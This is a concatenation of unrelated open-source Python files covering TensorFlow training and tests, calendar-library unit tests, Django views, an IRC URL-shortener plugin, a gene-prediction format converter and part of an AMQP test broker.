                num_steps=self.config.num_steps)
    self.io.save_w2id(self.data.word_to_id)
  def _build_graph(self):
    """Create train/valid/test models sharing one variable scope "Model"."""
    config = self.config
    config.fast_test = False
    # Evaluation uses batch size 1 on a cloned config.
    eval_config = Config(clone=config)
    eval_config.batch_size = 1
    initializer = self.model_initializer
    with tf.name_scope("Train"):
      with tf.variable_scope("Model", reuse=False, initializer=initializer):
        self.train_model = self.Model(config=config, is_training=True, loss_fct=self.loss_fct)
      tf.summary.scalar("Training Loss", self.train_model.cost)
      tf.summary.scalar("Learning Rate", self.train_model.lr)
    with tf.name_scope("Valid"):
      # reuse=True: validation shares the training weights.
      with tf.variable_scope("Model", reuse=True, initializer=initializer):
        self.validation_model = self.Model(config=config, is_training=False, loss_fct="softmax")
      tf.summary.scalar("Validation Loss", self.validation_model.cost)
    with tf.name_scope("Test"):
      with tf.variable_scope("Model", reuse=True, initializer=initializer):
        self.test_model = self.Model(config=eval_config, is_training=False)
  def _run(self):
    """Epoch loop: decay LR, train, validate, checkpoint after each epoch."""
    m, mvalid, mtest = self.train_model, self.validation_model, self.test_model
    config = self.config
    data = self.data
    params = self.params
    init_op = tf.initialize_all_variables()
    with tf.Session() as session:
      session.run(init_op)
      print("Starting training from epoch %d using %s loss" % (config.epoch, m.loss_fct))
      while config.epoch <= config.max_max_epoch:
        i = config.epoch
        # Exponential LR decay kicks in after config.max_epoch epochs.
        lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)
        m.assign_lr(session, config.learning_rate * lr_decay)
        print("\nEpoch: %d Learning rate: %.3f" % (i, session.run(m.lr)))
        train_perplexity = run_epoch(session, m,
                         data.train,
                         eval_op=m.train_op,
                         verbose=True,
                         opIO=self.io,
                         log_rate=params.log_rate,
                         save_rate=params.save_rate)
        print("Epoch: %d Train Perplexity: %.3f" % (i, train_perplexity))
        print("Validation using %s loss" % mvalid.loss_fct)
        valid_perplexity = run_epoch(session, mvalid, data.valid)
        print("Epoch: %d Valid Perplexity: %.3f" % (i, valid_perplexity))
        # Persist progress so --continue_training can resume here.
        config.step = 0
        config.epoch += 1
        config.save()
        self.io.save_checkpoint(session, "ep_%d.ckpt" % config.epoch)
if __name__ == "__main__":
import flags
train = Train(flags.config, flags.FLAGS)
train()
| pltrdy/tf_rnnlm | train.py | Python | apache-2.0 | 3,381 |
# coding=utf-8
from adbook.orm.entity import Entity
from adbook.orm.types.collection_ref import CollectionRef
class Group(Entity):
    """
    Group entity: a named address-book group with a collection of persons.
    """
    def __init__(self, name=""):
        super().__init__()
        # Display name of the group.
        self.name = name
        # Many-to-many collection of persons in this group.
        # NOTE(review): assumes the reverse reference on the person entity
        # is named "groups", and that Entity provides ``_manager`` --
        # confirm against the Entity/Person definitions.
        self.persons = CollectionRef("persons", self, Group._manager, "groups")
    def __str__(self):
        return "Group: {0}".format(self.name)
| avatar29A/adbook | adbook/orm/entities/groups.py | Python | mit | 406 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for PrecisionOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class InTopKTest(test.TestCase):
  """Tests for nn_ops.in_top_k (per-row "is target in top k predictions")."""

  def _validateInTopK(self, predictions, target, k, expected):
    """Evaluate in_top_k(predictions, target, k) and compare to expected."""
    np_ans = np.array(expected)
    with self.test_session():
      precision = nn_ops.in_top_k(predictions, target, k)
      out = precision.eval()
      self.assertAllClose(np_ans, out)
      self.assertShapeEqual(np_ans, precision)

  def testInTop1(self):
    predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
    target = [3, 1]
    self._validateInTopK(predictions, target, 1, [True, False])

  def testInTop2(self):
    predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
    target = [0, 2]
    self._validateInTopK(predictions, target, 2, [False, True])

  def testInTop2Tie(self):
    # Class 2 and 3 tie for 2nd, so both are considered in top 2.
    predictions = [[0.1, 0.3, 0.2, 0.2], [0.1, 0.3, 0.2, 0.2]]
    target = [2, 3]
    self._validateInTopK(predictions, target, 2, [True, True])

  def testInTop2_int64Target(self):
    # Same as testInTop2 but exercises the int64 target code path.
    predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
    target = np.asarray([0, 2]).astype(np.int64)
    self._validateInTopK(predictions, target, 2, [False, True])

  def testInTopNan(self):
    # NaN/inf predictions must never count as "in top k".
    predictions = [[0.1, float("nan"), 0.2, 0.4], [0.1, 0.2, 0.3, float("inf")]]
    target = [0, 2]
    self._validateInTopK(predictions, target, 2, [False, False])

  def testBadTarget(self):
    predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
    target = [0, 80000]
    with self.test_session():
      with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                                   "target.*out of range"):
        nn_ops.in_top_k(predictions, target, 2).eval()
if __name__ == "__main__":
test.main()
| npuichigo/ttsflow | third_party/tensorflow/tensorflow/python/kernel_tests/in_topk_op_test.py | Python | apache-2.0 | 2,682 |
import unittest
import freezegun
import ocal
import time
import os
class ocaltest(unittest.TestCase):
    """Unit tests for the ocal date library (MJD / Gregorian / Julian).

    Fixes applied during review: three ``except e:`` clauses (which evaluate
    the undefined name ``e`` and raise NameError when triggered) became
    ``except Exception as e:``, and the two-argument ``self.fail(msg, e)``
    calls (TypeError -- ``fail`` takes a single message) now format the
    exception into the message.
    """

    def assertYMD(self, o, cal, year, mon, day, dow, msg):
        """Assert calendar, year/month/day and day-of-week in one call."""
        self.assertEqual(o.calendar, cal,
                         "{} showed the wrong calendar".format(msg))
        self.assertEqual(o.year, year, "{} in year {} gave year {}"
                         .format(msg, year, o.year))
        self.assertEqual(o.month, mon, "{} in month {} gave month {}"
                         .format(msg, mon, o.month))
        self.assertEqual(o.day, day, "{} in day {} gave day {}"
                         .format(msg, day, o.day))
        self.assertEqual(o.dow, dow, "{} in dow {} gave dow {}"
                         .format(msg, dow, o.dow))

    def test_ocal_init(self):
        o = ocal.ocal(year=1995, month=9, day=27, calendar=ocal.GREGORIAN)
        self.assertEqual(o.date, 49987,
                         "init with gregorian didn't return correct mjd date")
        self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27,
                       3, "init with given gregorian")
        self.assertEqual(type(o.date), int, "o.date is {}, not int"
                         .format(type(o.date)))
        o = ocal.ocal(year=1995, month=9, day=27)
        self.assertEqual(o.date, 49987,
                         "init default:gregorian returned wrong mjd date")
        self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3,
                       "init with default gregorian")
        o = ocal.ocal(year=1995, month=9, day=14, calendar=ocal.JULIAN)
        self.assertEqual(o.date, 49987,
                         "init with julian didn't return correct mjd date")
        self.assertYMD(o, ocal.JULIAN, 1995, 9, 14, 3,
                       "init with given julian")
        self.assertEqual(type(o.date), int, "o.date is {}, not int"
                         .format(type(o.date)))
        try:
            o = ocal.ocal(year=1995, month=9, day=14, calendar=47)
        except ValueError as e:
            self.assertEqual(e.args[0], "Unknown calendar:47", "Invalid error")
        except BaseException as e:
            self.fail(
                "init with invalid calendar raised unexpected exception:{}"
                .format(repr(e)))
        else:
            self.fail("init with invalid calendar failed to raise exception")
        o = ocal.ocal(date=49987)
        self.assertEqual(o.date, 49987, "init with date didn't return itself!")
        self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3, "init with date")
        try:
            o = ocal.ocal(month=9, day=27, calendar=ocal.GREGORIAN)
        except KeyError:
            pass
        except Exception as e:
            # was `except e:` -- NameError whenever a non-KeyError escaped
            self.fail("Raised unexpected exception (with missing year): {}"
                      .format(e))
        else:
            self.fail("Missing exception when year missing")
        try:
            o = ocal.ocal(year=1995, day=27, calendar=ocal.GREGORIAN)
        except KeyError:
            pass
        except Exception as e:
            self.fail("Raised unexpected exception (with missing month): {}"
                      .format(e))
        else:
            self.fail("Missing exception when month missing")
        try:
            # NOTE(review): other calls pass ocal.GREGORIAN here; this passes
            # the ocal.ocal.gregorian function instead -- confirm intent.
            o = ocal.ocal(year=1995, month=9, calendar=ocal.ocal.gregorian)
        except KeyError:
            pass
        except Exception as e:
            self.fail("Raised unexpected exception (with missing day): {}"
                      .format(e))
        else:
            self.fail("Missing exception when day missing")

    def test_ocal_gregorian(self):
        o = ocal.gregorian(1995, 9, 27)
        self.assertEqual(
            o.date, 49987, "gregorian init didn't return correct mjd date")
        self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27,
                       3, "init with gregorian function")

    def test_ocal_julian(self):
        o = ocal.julian(1995, 9, 14)
        self.assertEqual(
            o.date, 49987, "julian init didn't return correct mjd date")
        self.assertYMD(o, ocal.JULIAN, 1995, 9, 14,
                       3, "init with julian function")

    def test_ocal_mjdate(self):
        o = ocal.ocal.mj_date(49987)
        self.assertEqual(
            o.date, 49987, "mj_date init didn't return correct mjd date")
        self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3, "init with mj_date")

    def test_ocal_get_date(self):
        o = ocal.ocal.mj_date(49987)
        self.assertEqual(o.get_date(), 49987,
                         "get_date didn't return correct mjd date")

    def test_ocal_get_ymd_g(self):
        o = ocal.ocal.mj_date(49987)
        self.assertEqual(o.get_ymd_g(), (1995, 9, 27),
                         "get_ymd_g() didn't return expected year,month,day")

    def test_ocal_get_ymd_j(self):
        o = ocal.ocal.mj_date(49987)
        self.assertEqual(o.get_ymd_j(), (1995, 9, 14),
                         "get_ymd_j() didn't return expected year,month,day")

    def test_ocal_get_dow(self):
        o = ocal.ocal.mj_date(49987)
        self.assertEqual(
            o.get_dow(), 3, "get_dow didn't return expected day of week")

    # modifying methods
    def test_ocal_add_days(self):
        o = ocal.ocal.mj_date(100)
        self.assertEqual(o.get_date(), 100,
                         "add_days test didn't start with 100")
        o.add_days(10)
        self.assertEqual(o.get_date(), 110, "add_days failed adding 10")
        o.add_days(-200)
        self.assertEqual(o.get_date(), -90, "add_days failed subtracting 200")

    def test_ocal_next_dow(self):
        o = ocal.ocal.mj_date(49987)
        o.next_dow(1, 0)
        self.assertEqual(o.get_ymd_g(), (1995, 10, 1),
                         "first sunday after 9/27/1995 failed")
        self.assertEqual(
            o.dow, 0, "went to dow 0, but made it to {} instead".format(o.dow))
        o = ocal.ocal.gregorian(2014, 6, 1)
        o.next_dow(1, 0)  # advance to Sunday, but 6/1/2014 IS a Sunday
        self.assertEqual(o.get_ymd_g(), (2014, 6, 8),
                         "Advancing to same day failed")
        o = ocal.ocal.gregorian(2014, 6, 1)
        o.next_dow(-1, 0)  # advance to last Sunday in May
        self.assertEqual(o.get_ymd_g(), (2014, 5, 25),
                         "Advancing to last day in prev month failed")
        o.next_dow(-2, 4)  # advance back a couple weeks
        self.assertEqual(o.get_ymd_g(), (2014, 5, 15),
                         "Advancing back 2 weeks failed")
        o.next_dow(2, 4)  # advance forward a couple weeks
        self.assertEqual(o.get_ymd_g(), (2014, 5, 29),
                         "Advancing forward 2 weeks failed")
        try:
            o.next_dow(0, 3)  # 0: ValueError
        except ValueError:
            pass
        except BaseException as e:
            # fail() takes a single message; the old two-argument call
            # raised TypeError instead of reporting the failure.
            self.fail("Unexpected exception thrown: {}".format(e))
        else:
            self.fail("No exception thrown. Expected ValueError")
        o = ocal.ocal.gregorian(2014, 6, 2)
        o.next_dow(-1, 0)
        self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
                         "Going back to yesterday failed")
        o = ocal.ocal.gregorian(2014, 6, 1)
        o.next_dow(1, 0, offset=-1)
        self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
                         '"Advancing" to self (via offset=-1) failed"')
        o = ocal.ocal.gregorian(2014, 6, 1)
        o.next_dow(-1, 0, offset=1)
        self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
                         '"Advancing" to self (via offset=1) failed"')

    def test_ocal_repr(self):
        o = ocal.julian(2015, 12, 25)
        rp = repr(o)
        exp = "ocal.ocal.julian(2015, 12, 25)"
        self.assertEqual(rp, exp,
                         "repr failure. Expected '{}', got '{}'"
                         .format(exp, rp))
        # Switching the calendar attribute changes the repr's calendar too.
        o.calendar = ocal.GREGORIAN
        rp = repr(o)
        exp = "ocal.ocal.gregorian(2016, 1, 7)"
        self.assertEqual(rp, exp,
                         "repr failure. Expected '{}', got '{}'"
                         .format(exp, rp))

    def test__add(self):
        n = ocal.julian(2015, 12, 25)
        th = n + 12
        self.assertYMD(th, ocal.JULIAN, 2016, 1, 6,
                       2, "__add from Nativity 2015")
        self.assertEqual(th.get_ymd_j(), (2016, 1, 6),
                         "__add__ failed. Nativity+12 is {}"
                         .format(th.get_ymd_j()))

    def test__sub(self):
        th = ocal.julian(2016, 1, 6)
        n = th - 12
        self.assertYMD(n, ocal.JULIAN, 2015, 12, 25,
                       4, "__sub__from Theophany (")
        self.assertEqual(n.get_ymd_j(), (2015, 12, 25),
                         "__sub__ failed. Theophany-12 is {}"
                         .format(n.get_ymd_j()))
        self.assertEqual(th - n, 12, "relative difference failed."
                         "Difference between Theophany and Nativity is {} days"
                         .format(th - n))

    def test__iadd(self):
        th = ocal.julian(2016, 1, 6)
        svth = th
        th += 3
        # += must mutate in place, not rebind to a new object.
        self.assertEqual(id(th), id(svth), "+= changed th object")
        nth = ocal.julian(2016, 1, 9)
        self.assertEqual(th, nth, "+= {} not the 9th".format(th))

    def test__isub(self):
        th = ocal.julian(2016, 1, 6)
        svth = th
        th -= 3
        self.assertEqual(id(th), id(svth), "-= changed th object")
        nth = ocal.julian(2016, 1, 3)
        self.assertEqual(th, nth, "-= {} not the 3rd".format(th))

    def test__cmp(self):
        d1 = ocal.gregorian(2016, 1, 5)
        d2 = ocal.gregorian(2016, 1, 6)
        self.assertLess(d1, d2, "failure: {} not less than {}".format(d1, d2))
        d1 += 1
        self.assertEqual(d1, d2, "failure: {} not equal to {}".format(d1, d2))
        d1 += 1
        self.assertGreater(
            d1, d2, "failure: {} not greater than {}".format(d1, d2))
class ocalpascha(unittest.TestCase):
    """Spot-check computed Pascha (Easter) dates against known MJDs."""
    def test_pascha(self):
        # (year, expected modified-Julian-date of Pascha)
        ydates = (
            (2014, 56767),
            (2001, 52014),
            (2000, 51664),
            (1960, 37041),
            (1958, 36306),
            (1977, 43243)
        )
        for yd in ydates:
            o = ocal.pascha(yd[0])
            # The original messages contained "{}" placeholders that were
            # never filled in; format them so a failure names the year.
            self.assertEqual(
                o.dow, 0,
                "Pascha for {} not on Sunday according to o.dow".format(yd[0]))
            self.assertEqual(
                o.get_dow(), 0,
                "Pascha for year {} not on Sunday!".format(yd[0]))
            self.assertEqual(o.get_date(), yd[1],
                             "Pascha failed for year {} ({} != {})"
                             .format(yd[0], o.get_date(), yd[1]))
class test_time_today(unittest.TestCase):
    """Tests for ocal.today(), pinned to UTC under a frozen clock."""
    def setUp(self):
        # Force TZ=UTC so the frozen timestamps map to predictable dates;
        # the previous values are restored in tearDown.
        self.sv = time.tzname, time.timezone, time.altzone
        try:
            self.tzsv = os.environ['TZ']
        except KeyError:
            self.tzsv = None
        os.environ['TZ'] = 'UTC+0'
        time.tzset()
        self.assertEqual(time.timezone, 0)
    def tearDown(self):
        time.tzname, time.timezone, time.altzone = self.sv
        if self.tzsv is None:
            del os.environ['TZ']
        else:
            os.environ['TZ'] = self.tzsv
    def daytest(self, g, ymd):
        # Tuple parameters in a `def` signature are Python-2-only syntax;
        # accept the (year, month, day) triple and unpack it in the body.
        y, m, d = ymd
        self.assertEqual(g.calendar, ocal.GREGORIAN, "wrong calendar")
        self.assertEqual(g.year, y, "returned {} not {}".format(g.year, y))
        self.assertEqual(g.month, m, "returned {} not {}".format(g.month, m))
        self.assertEqual(g.day, d, "returned {} not {}".format(g.day, d))
    @freezegun.freeze_time('2010-02-18 10:59:45')
    def test_today_1(self):
        "Test various permutations of today, using freeze_time"
        # first, no midnight
        g = ocal.today()
        self.daytest(g, (2010, 2, 18))
        g = ocal.today(midnight=11)
        self.daytest(g, (2010, 2, 18))
        # midnight=10: 10:59 is past the configured day rollover.
        g = ocal.today(midnight=10)
        self.daytest(g, (2010, 2, 19))
    @freezegun.freeze_time('2013-07-01 18:00:01')
    def test_today_2(self):
        # first, no midnight
        g = ocal.today()
        self.daytest(g, (2013, 7, 1))
        g = ocal.today(midnight=19)
        self.daytest(g, (2013, 7, 1))
        g = ocal.today(midnight=18)
        self.daytest(g, (2013, 7, 2))
if __name__ == "__main__":
unittest.main()
| mlv/ocal | test_ocal.py | Python | mit | 12,174 |
from django.shortcuts import render, redirect, get_object_or_404
from blogEngine.models import blogPost, blogSlug
def postList(request, pk):
    # TODO: unimplemented stub -- returns None, which Django treats as an
    # invalid response if this view is ever wired to a URL.
    pass
##Both of these just deal with url management, and keeping url's human readable.
def postView(request, pk=None, slug=None):
    """Render a single blog post, enforcing its canonical slug in the URL.

    If the requested slug is missing or stale, redirect to the pk URL with
    the post's current mainSlug before rendering.
    """
    postInstance = get_object_or_404(blogPost, pk=pk)
    # Redirects you to the proper name, if you're not using it.
    if postInstance.mainSlug and (not slug or postInstance.mainSlug.slug != slug):
        return redirect(postView, pk=pk, slug=postInstance.mainSlug.slug)
    # (Removed a leftover debug print of the post title.)
    context = {
        'post': postInstance,
    }
    return render(request, "blog/post.html", context)
def getUrlFromSlug(request, slug):
    """Resolve a bare slug URL to the canonical pk-based post view."""
    postSlug = get_object_or_404(blogSlug, slug=slug)
    # postView will then redirect again to the pk+slug form if needed.
    return redirect(postView, postSlug.parent.pk)
| traverseda/personalSite | blogEngine/views.py | Python | unlicense | 822 |
"""
uh.cx
X-Chat Version
@homepage: http://uh.cx
@copyright: Copyright (C) 2015 J. Boehm
"""
__module_name__ = "uh.cx"
__module_version__ = "0.2"
__module_description__ = "Make a shortened URL with uh.cx and post it to a channel or user."
__module_author__ = "uh.cx (J. Boehm)"
import urllib
import traceback
import json
import urllib2
import xchat
class Manager:
    """Client facade for the uh.cx URL-shortener REST API."""
    # Endpoint that accepts a POST with the long URL and returns JSON.
    _url = 'http://uh.cx/api/create'
    def __init__(self):
        pass
    class Link:
        """Value object for one shortened URL (direct/preview + QR images)."""
        def __init__(self):
            pass
        url_original = ''
        url_redirect = ''
        url_preview = ''
        qr_redirect = ''
        qr_preview = ''
    class InvalidResponseException(Exception):
        # Raised when the API answers with an HTTP error or a JSON body
        # that is missing expected keys.
        pass
    class CouldNotCreateLinkException(Exception):
        # NOTE(review): declared but never raised anywhere in this module.
        pass
    class ResponseValidator:
        """Checks that an API response contains every required key."""
        _keys = ['QrDirect', 'QrPreview', 'UrlDirect', 'UrlOriginal', 'UrlPreview']
        def __init__(self):
            pass
        @staticmethod
        def check(response):
            # All keys must be present for the response to be usable.
            for key in Manager.ResponseValidator._keys:
                if key not in response:
                    return False
            return True
    @staticmethod
    def create(url):
        """POST *url* to the API and return a populated Manager.Link.

        Raises Manager.InvalidResponseException on HTTP errors or when
        the JSON body fails validation.
        """
        try:
            request = urllib2.Request(Manager._url, urllib.urlencode({'url': url}))
            response = urllib2.urlopen(request)
            response_data = json.loads(response.read())
        except urllib2.HTTPError:
            raise Manager.InvalidResponseException()
        if not Manager.ResponseValidator.check(response_data):
            raise Manager.InvalidResponseException()
        link = Manager.Link()
        link.qr_preview = response_data['QrPreview']
        link.qr_redirect = response_data['QrDirect']
        link.url_original = response_data['UrlOriginal']
        link.url_preview = response_data['UrlPreview']
        link.url_redirect = response_data['UrlDirect']
        return link
def on_uhcx(word, word_eol, userdata):
    # XChat command hook: /uhcx <url> -> shorten the URL and SAY it.
    # `word` is the tokenized command line; word[0] is the command itself.
    if len(word) < 2:
        print 'Usage: /uhcx http://your.long.url/'
    else:
        try:
            url = word[1]
            o = Manager.create(url)
            xchat.command('SAY ' + o.url_redirect)
        except Manager.InvalidResponseException:
            print 'An error occured. Did you try to shorten an invalid URL?'
        except:
            # NOTE(review): print_exc() writes the traceback itself and
            # returns None, so this line also prints "None".
            print traceback.print_exc()
            print ''
            print 'An unknown error occurred! I cannot create your url. Sorry!'
    # EAT_ALL keeps the raw /uhcx line from being echoed to the channel.
    return xchat.EAT_ALL
xchat.hook_command('uhcx', on_uhcx, help='/uhcx http://your.long.url/')
| jeboehm/uhcx-xchat | uhcx_xchat.py | Python | gpl-2.0 | 2,529 |
#!/usr/bin/env python
import Genscan
import GFF
# Convert Genscan gene predictions to GFF lines on stdout, shifting all
# coordinates by `offset` (Genscan was run on a sub-sequence of scaffold_42).
meta, data, proteins = Genscan.load('genscan.txt')
offset = 16000000
reference = 'scaffold_42'
gffSource = 'genscan'
gffClass = 'Genscan'
featureType = 'gene'
subfeatureType = 'exon'
for gene in data:
    # Gene name is the prefix of the "gene.exon" id (e.g. "3" from "3.02").
    name = gene[0]['gene.exon'].split('.')[0]
    output = []
    extrema = []
    for exon in gene:
        # Init/Intr/Term/Sngl are Genscan's coding-exon types; other
        # prediction rows (e.g. promoter/polyA) are skipped.
        if exon['type'] in ['Init','Intr','Term','Sngl']:
            output.append(GFF.output(
                reference = reference,
                source = gffSource,
                type = subfeatureType,
                start = exon['start']+offset-1,
                end = exon['end']+offset-1,
                strand = exon['strand'],
                score = exon['score'],
                group = '%s %s' % (gffClass, name)
            ))
            extrema.append(exon['start'])
            extrema.append(exon['end'])
    # Parent gene feature spans the outermost exon coordinates.
    output.insert(0, GFF.output(
        reference = 'scaffold_42',
        source = gffSource,
        type = featureType,
        start = min(extrema)+offset-1,
        end = max(extrema)+offset-1,
        strand = gene[0]['strand'],
        group = '%s %s' % (gffClass, name)
    ))
    for out in output:
        print out
| PapenfussLab/Mungo | snippets/genscan2gff.py | Python | artistic-2.0 | 1,215 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4
from django.conf import settings
from django.db.models import Sum, Count, Avg
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib import messages
from ..accounts.models import UserProfile
from ..checkin.models import Freggie, FreggieGoal, NonVeg
from itertools import chain
from operator import attrgetter, itemgetter
from django.forms.models import model_to_dict
from datetime import datetime
from utils import build_foodlog_xls
@login_required
def download_xls(request):
    """Export the user's combined food log (non-veg + freggie entries)
    as a timestamped .xls attachment."""
    # Raises 404 if the user has no profile; the object itself is unused.
    p=get_object_or_404(UserProfile, user=request.user)
    nonvegs=NonVeg.objects.filter(user=request.user)
    combolist=[]
    for i in nonvegs:
        row={'mydatetime': i.evdt, 'item':i.nonveg, 'quantity': i.quantity}
        combolist.append(row)
    freggies=Freggie.objects.filter(user=request.user)
    for i in freggies:
        row={'mydatetime': i.evdt, 'item':i.freggie, 'quantity': i.quantity}
        combolist.append(row)
    # Newest entries first.
    combolist=sorted(combolist,key=itemgetter('mydatetime'), reverse=True)
    filename = datetime.now().strftime('%m-%d-%Y_%H:%M:%S') + '.xls'
    # `mimetype=` is the pre-Django-1.7 spelling of `content_type=`.
    response = HttpResponse(mimetype="application/vnd.ms-excel")
    response['Content-Disposition'] = 'attachment; filename=' + filename
    excelwb = build_foodlog_xls(combolist)
    # xlwt workbooks can save straight into the response stream.
    excelwb.save(response)
    return response
@login_required
def profile(request):
    """Render the logged-in user's profile: the merged food log plus
    per-day freggie totals paired with that day's goal."""
    # Raises 404 if the user has no profile; the object itself is unused.
    p = get_object_or_404(UserProfile, user=request.user)
    nonvegs = NonVeg.objects.filter(user=request.user)
    freggies = Freggie.objects.filter(user=request.user)
    # Merge both log types into one reverse-chronological list.
    combolist = sorted(chain(nonvegs, freggies), key=attrgetter('evdt'),
                       reverse=True)
    # Per-day freggie quantity totals for this user.  (A dead aggregate
    # over all users' entries, immediately overwritten, was removed here.)
    agg = Freggie.objects.filter(user=request.user).values('evdate').annotate(freggie=Sum('quantity')).order_by()
    goallist = []
    for a in agg:
        # NOTE(review): assumes a FreggieGoal row exists for every day that
        # has entries; FreggieGoal.DoesNotExist would surface as a 500.
        goal = FreggieGoal.objects.get(user=request.user, evdate=a['evdate'])
        a['goal'] = goal.freggie_goal
        goallist.append(a)
    return render_to_response('profile/profile.html',
                              {'goallist': goallist,
                               'freggies': freggies,
                               'nonvegs': nonvegs,
                               'combolist': combolist},
                              context_instance=RequestContext(request),)
@login_required
def admin_profile(request, username):
    """Render another user's food log by username.

    NOTE(review): despite the name, only @login_required protects this
    view -- any authenticated user can see any other user's log; confirm
    whether a staff/superuser check is intended.
    """
    u=get_object_or_404(User, username=username)
    p=get_object_or_404(UserProfile, user=u)
    nonvegs=NonVeg.objects.filter(user=u)
    freggies=Freggie.objects.filter(user=u)
    # Merged reverse-chronological log, same shape as the profile view.
    combolist = sorted(chain(nonvegs, freggies), key=attrgetter('evdt'),
        reverse=True)
    return render_to_response('profile/admin-profile.html',
        {'combolist':combolist,
        'u':u,
        'profile':p
        },
        context_instance = RequestContext(request),)
| videntity/tweatwell | apps/profile/views.py | Python | gpl-2.0 | 3,216 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
import collections as _collections
import os as _os
import proton as _proton
import proton.handlers as _handlers
import proton.reactor as _reactor
import uuid as _uuid
import shutil as _shutil
import subprocess as _subprocess
import sys as _sys
import time as _time
import tempfile as _tempfile
import pathlib as _pathlib
class Broker(object):
    """Minimal in-memory AMQP broker built on the proton reactor.

    Queues are created on demand by the handler; supports optional SASL
    user/password authentication and TLS (scheme "amqps").
    """
    def __init__(self, scheme, host, port, id=None, user=None, password=None, ready_file=None,
                 cert=None, key=None, key_password=None, trusted_db=None):
        self.scheme = scheme
        self.host = host
        self.port = port
        self.id = id
        self.user = user
        self.password = password
        self.ready_file = ready_file
        self.cert = cert
        self.key = key
        self.key_password = key_password
        self.trusted_db = trusted_db

        if self.id is None:
            self.id = "broker-{0}".format(_uuid.uuid4())

        self.container = _reactor.Container(_Handler(self), self.id)

        # Holds the temporary SASL config dir; only created when user
        # authentication is configured (see _init_sasl_config).
        self._config_dir = None

    def init(self):
        """Validate configuration and set up SASL; exits on bad config."""
        if self.user is not None:
            if self.password is None:
                self.fail("A password is required for user authentication")
            self._init_sasl_config()

        if self.scheme == "amqps":
            if self.key is None or self.cert is None:
                self.fail("if scheme is amqps, key and cert files must be specified")
            if not _pathlib.Path(self.key).is_file():
                self.fail("key file %s does not exist" % (self.key))
            if not _pathlib.Path(self.cert).is_file():
                self.fail("cert file %s does not exist" % (self.cert))
            if self.trusted_db and not _pathlib.Path(self.trusted_db).is_file():
                self.fail("trusted db file %s does not exist" % (self.trusted_db))

    def _init_sasl_config(self):
        """Write a Cyrus SASL config + user database in a temp dir."""
        self._config_dir = _tempfile.mkdtemp(prefix="brokerlib-", suffix="")
        config_file = _os.path.join(self._config_dir, "proton-server.conf")
        sasldb_file = _os.path.join(self._config_dir, "users.sasldb")

        _os.environ["PN_SASL_CONFIG_PATH"] = self._config_dir

        with open(config_file, "w") as f:
            f.write("sasldb_path: {0}\n".format(sasldb_file))
            f.write("mech_list: PLAIN SCRAM-SHA-1\n")

        # NOTE(review): the password is interpolated into a shell command;
        # fine for test harness use, but not for untrusted input.
        command = "echo '{0}' | saslpasswd2 -p -f {1} '{2}'".format \
            (self.password, sasldb_file, self.user)

        try:
            _subprocess.check_call(command, shell=True)
        except _subprocess.CalledProcessError as e:
            self.fail("Failed adding user to SASL database: {0}", e)

    # Logging hooks: info/notice/warn are no-ops by default so embedders
    # can override just the levels they care about.
    def info(self, message, *args):
        pass

    def notice(self, message, *args):
        pass

    def warn(self, message, *args):
        pass

    def error(self, message, *args):
        self._sys_stderr_write(message, *args)

    def _sys_stderr_write(self, message, *args):
        """Format *message* with *args* and write it to stderr."""
        _sys.stderr.write("{0}\n".format(message.format(*args)))
        _sys.stderr.flush()

    def fail(self, message, *args):
        """Report an error and terminate the process."""
        self.error(message, *args)
        _sys.exit(1)

    def run(self):
        """Run the reactor loop, then clean up the temporary SASL dir."""
        self.container.run()
        # _config_dir may still be None (no SASL config was created).  The
        # original cleanup called _os.path.exists(None) in that case, and
        # passed the undefined attribute `self.dir` to rmtree, raising
        # AttributeError instead of removing the directory.
        if self._config_dir is not None and _os.path.exists(self._config_dir):
            _shutil.rmtree(self._config_dir, ignore_errors=True)
class _Queue(object):
    """A named message queue with round-robin delivery to its consumers."""
    def __init__(self, broker, address):
        self.broker = broker
        self.address = address
        # FIFO of stored messages awaiting delivery.
        self.messages = _collections.deque()
        # Sender links subscribed to this queue.
        self.consumers = _collections.deque()

        self.broker.info("Created {0}", self)

    def __repr__(self):
        return "queue '{0}'".format(self.address)

    def add_consumer(self, link):
        """Register a sender link as a consumer of this queue."""
